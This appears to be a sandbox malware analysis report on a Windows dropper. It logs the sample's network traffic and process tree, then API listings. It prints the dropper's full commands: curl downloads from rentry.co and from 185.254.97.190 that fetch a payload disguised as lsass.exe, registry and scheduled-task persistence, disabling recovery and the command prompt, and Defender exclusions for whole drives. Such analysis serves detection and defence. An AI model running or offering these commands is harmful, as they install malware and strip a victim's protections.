Oct 15, 2024 11:26:07.990890026 CEST	1.1.1.1	192.168.2.6	0x4dcd	No error (0)	rentry.co	104.26.3.16	A (IP address)	IN (0x0001)	false
Oct 15, 2024 11:26:07.990890026 CEST	1.1.1.1	192.168.2.6	0x4dcd	No error (0)	rentry.co	104.26.2.16	A (IP address)	IN (0x0001)	false
Oct 15, 2024 11:26:07.990890026 CEST	1.1.1.1	192.168.2.6	0x4dcd	No error (0)	rentry.co	172.67.75.40	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

rentry.co

185.254.97.190:2024

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49714	185.254.97.190	2024	5412	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 11:26:12.608465910 CEST	103	OUT	GET /download/XClient.exe HTTP/1.1 Host: 185.254.97.190:2024 User-Agent: curl/7.83.1 Accept: /

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49713	104.26.3.16	443	4512	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-15 09:26:08 UTC	86	OUT	GET /i7zgdqy6/raw/ HTTP/1.1 Host: rentry.co User-Agent: curl/7.83.1 Accept: /
2024-10-15 09:26:09 UTC	699	IN	HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 09:26:08 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 194 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L2qUpyrHgrb%2B0HVsu5OG8K3LiPwQ0XhkQRywWhqj9wa0LR7CbsmgMj8FA1wm3TD7euel4%2BphQpDoH4RiRpISXg6PZtJT5DDbcGeLOqjN94%2FP%2BCFgG6uU0bNuhQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2ec4105efa6b29-DFW
2024-10-15 09:26:09 UTC	194	IN	Data Raw: 73 65 74 20 22 73 74 61 72 74 75 70 3d 46 61 6c 73 65 22 0d 0a 73 65 74 20 22 72 65 67 69 73 74 72 79 3d 54 72 75 65 22 0d 0a 73 65 74 20 22 73 63 68 74 61 73 6b 3d 54 72 75 65 22 0d 0a 73 65 74 20 22 6c 69 6e 6b 3d 68 74 74 70 3a 2f 2f 31 38 35 2e 32 35 34 2e 39 37 2e 31 39 30 3a 32 30 32 34 2f 64 6f 77 6e 6c 6f 61 64 2f 58 43 6c 69 65 6e 74 2e 65 78 65 22 0d 0a 73 65 74 20 22 46 69 6c 65 45 78 65 63 75 74 61 62 6c 65 3d 6c 73 61 73 73 2e 65 78 65 22 0d 0a 73 65 74 20 22 57 44 65 78 63 3d 54 72 75 65 22 0d 0a 73 65 74 20 22 42 6c 6f 63 6b 46 6f 6c 64 65 72 3d 54 72 75 65 22 Data Ascii: set "startup=False"set "registry=True"set "schtask=True"set "link=http://185.254.97.190:2024/download/XClient.exe"set "FileExecutable=lsass.exe"set "WDexc=True"set "BlockFolder=True"

Target ID:	0
Start time:	05:26:06
Start date:	15/10/2024
Path:	C:\Users\user\Desktop\nkYzjyrKYK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nkYzjyrKYK.exe"
Imagebase:	0x400000
File size:	95'744 bytes
MD5 hash:	7F5E49656E9AD3806D18F23766F7CAD5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	05:26:06
Start date:	15/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	05:26:07
Start date:	15/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe"
Imagebase:	0x7ff699f80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	05:26:07
Start date:	15/10/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping 8.8.8.8 -n 1
Imagebase:	0x7ff60eab0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:26:07
Start date:	15/10/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net session
Imagebase:	0x7ff6c1e40000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:26:07
Start date:	15/10/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 session
Imagebase:	0x7ff60e010000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:26:07
Start date:	15/10/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -s -o u32y.bat https://rentry.co/i7zgdqy6/raw/
Imagebase:	0x7ff784760000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:26:09
Start date:	15/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f
Imagebase:	0x7ff778410000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:26:09
Start date:	15/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
Imagebase:	0x7ff778410000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:26:09
Start date:	15/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanelNamespace" /t REG_DWORD /d 1 /f
Imagebase:	0x7ff778410000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:26:09
Start date:	15/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f
Imagebase:	0x7ff778410000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:26:09
Start date:	15/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -Command "Disable-ComputerRestore -Drive 'C:'; Enable-ComputerRestore -Drive 'C:'"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:26:11
Start date:	15/10/2024
Path:	C:\Windows\System32\ReAgentc.exe
Wow64 process (32bit):	false
Commandline:	reagentc.exe /disable
Imagebase:	0x7ff6f4f80000
File size:	44'544 bytes
MD5 hash:	A109CC3B919C7D40E4114966340F39E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:26:12
Start date:	15/10/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h ssh
Imagebase:	0x7ff649c60000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:26:12
Start date:	15/10/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -s -o C:\Users\user\AppData\Local\Temp\lsass.exe "http://185.254.97.190:2024/download/XClient.exe"
Imagebase:	0x7ff784760000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:26:20
Start date:	15/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	lsass.exe
Imagebase:	0x7ff7ac940000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:26:20
Start date:	15/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f
Imagebase:	0x7ff778410000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:26:20
Start date:	15/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F
Imagebase:	0x7ff7a5450000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:26:20
Start date:	15/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn "winlogon" /tr "lsass.exe" /sc ONSTART /ru SYSTEM /f
Imagebase:	0x7ff7a5450000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:26:21
Start date:	15/10/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net session
Imagebase:	0x7ff6c1e40000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:26:21
Start date:	15/10/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 session
Imagebase:	0x7ff60e010000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:26:21
Start date:	15/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:26:21
Start date:	15/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	lsass.exe
Imagebase:	0x7ff7ac940000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:26:21
Start date:	15/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	lsass.exe
Imagebase:	0x7ff7ac940000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	05:26:24
Start date:	15/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:26:28
Start date:	15/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'D:\'"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	05:26:29
Start date:	15/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\lsass.exe"
Imagebase:	0x7ff7ac940000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	05:26:37
Start date:	15/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\lsass.exe"
Imagebase:	0x7ff7ac940000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	05:26:42
Start date:	15/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	05:26:59
Start date:	15/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	05:27:19
Start date:	15/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls "C:\Windows\appcompat\ssh" /deny user:F
Imagebase:	0x7ff769d60000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	83

Executed Functions

Function 0040ADD6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
Part of subcall function 0040E900: HeapReAlloc.KERNEL32(00980000,00000000,?,?), ref: 0040E967

GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040ADED
LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040ADFA
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040AE0C
GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040AE19
FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AE1E

Strings

Kernel32.DLL, xrefs: 0040ADF3
GetLongPathNameW, xrefs: 0040AE06

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 820969696-2943376620
Opcode ID: d689e7c6ef715de522d1227690b0767884cdf769d34ed9e685d0497adf4c9375
Instruction ID: e37525813661028bcc8eb249af8eccfe35d88e27d7fdedfae3674fb0e28627f1
Opcode Fuzzy Hash: d689e7c6ef715de522d1227690b0767884cdf769d34ed9e685d0497adf4c9375
Instruction Fuzzy Hash: FAF082722452547FC3216BB6AC8CEEB3EACDF86755300443AF905E2251EA7C5D2086BD

Function 00409A1F Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 395
memorypipesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00409A69
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409AF1
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B46
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B8C
GetStdHandle.KERNEL32(000000F6), ref: 00409BD6
GetStdHandle.KERNEL32(000000F5), ref: 00409BEA
GetStdHandle.KERNEL32(000000F4), ref: 00409BFE
wcslen.MSVCRT ref: 00409C2A
wcslen.MSVCRT ref: 00409C38
HeapAlloc.KERNEL32(00000000,00000000), ref: 00409C52
wcscpy.MSVCRT ref: 00409C6A
wcscat.MSVCRT ref: 00409C71
wcscat.MSVCRT ref: 00409C7C
wcscpy.MSVCRT ref: 00409C88
wcscat.MSVCRT ref: 00409CA3
wcscat.MSVCRT ref: 00409CB0
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 00409CEA
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D08
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D14
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D20
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D26
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00409D3A
EnterCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D4C
LeaveCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D63
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D97
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DAE
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DBA
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DC6
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DD2
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DDE
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DEA
wcslen.MSVCRT ref: 00409E04
wcscpy.MSVCRT ref: 00409E2A
memset.MSVCRT ref: 00409E56
ShellExecuteExW.SHELL32 ref: 00409EB3
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409ED2
EnterCriticalSection.KERNEL32(00418730), ref: 00409EE4
LeaveCriticalSection.KERNEL32(00418730), ref: 00409EFB

Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
Part of subcall function 004099C7: DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
Part of subcall function 004099C7: CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5

HeapFree.KERNEL32(00000000,?), ref: 00409F37

Strings

$0A, xrefs: 00409C0E
x, xrefs: 00409DEC

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
String ID: $0A$x
API String ID: 550696126-3693508903
Opcode ID: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
Instruction ID: 1938edec6f8ec7f018cd84e447521b205a2f1ffc1a01eed9409a43f0bd8935e3
Opcode Fuzzy Hash: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
Instruction Fuzzy Hash: 8AE15B71908341AFD321DF24D841B9BBBE4FF84350F148A3FF499A2291DB799944CB9A

Function 0040196C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404519), ref: 00401A3B
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A90
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AE5
PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AF0
PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B2F
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B49

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(00980000,00000000,?,?), ref: 0040E5BC

Strings

$pA, xrefs: 00401B3D
$pA, xrefs: 00401A84
$pA, xrefs: 00401A31
$pA, xrefs: 00401AD9

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
String ID: $pA$$pA$$pA$$pA
API String ID: 368575804-1531182785
Opcode ID: 291aedd6d8e0cd9606a79c5c54f9e5ca1a0afb1434a24687cb3d53f003eb9dfa
Instruction ID: 7226354e244135f3a7293121bd0c5faf706f4cf1cd60fca57ba481f11b9cb304
Opcode Fuzzy Hash: 291aedd6d8e0cd9606a79c5c54f9e5ca1a0afb1434a24687cb3d53f003eb9dfa
Instruction Fuzzy Hash: 3D510F71104304BED600BBB2DC42E7F7A6DEB84308F018C3FB540A50E2EA3D99655A6E

Function 00401000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 108
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040100F
GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035

Part of subcall function 0040E4D0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
Part of subcall function 0040E4D0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7

Part of subcall function 0040A1C0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9

Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(00418730,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691

Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D

Part of subcall function 004053B5: InitializeCriticalSection.KERNEL32(00418708,0040107B,00000000,00001000,00000000,00000000), ref: 004053BA

GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A

